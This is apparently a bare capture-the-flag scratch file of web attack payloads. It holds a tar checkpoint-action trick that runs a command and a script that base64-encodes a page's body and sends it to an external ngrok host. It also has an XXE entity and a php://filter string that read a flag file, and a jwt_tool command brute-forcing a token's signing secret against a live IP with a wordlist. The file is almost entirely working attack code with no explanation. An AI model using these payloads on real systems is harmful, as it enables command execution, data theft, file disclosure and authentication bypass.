tar
cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="ls -l"

<script>
    document.location.href =
        "https://3569-149-3-124-22.eu.ngrok.io/src=" +
        btoa(document.getElementsByTagName("body")[0].innerHTML);
</script>

syntax-crawler

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///var/www/html/flag">
]>
<foo>
&xxe;
</foo>

"php://filter/convert.base64-encode/resource=/var/www/html/flag">



python3 jwt_tool.py -t http://35.198.93.134:30791/api/app/admin -rc
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MTIsImlhdCI6MTYzNTkzNjY4OCwiZ
XhwIjoxNjM2MDIzMDg4fQ.tQ2KlBU8tI5V1Akiqhwy2LSEOF9oBTvnYFs_xgwro04" -C -d
~/rockyou.txt
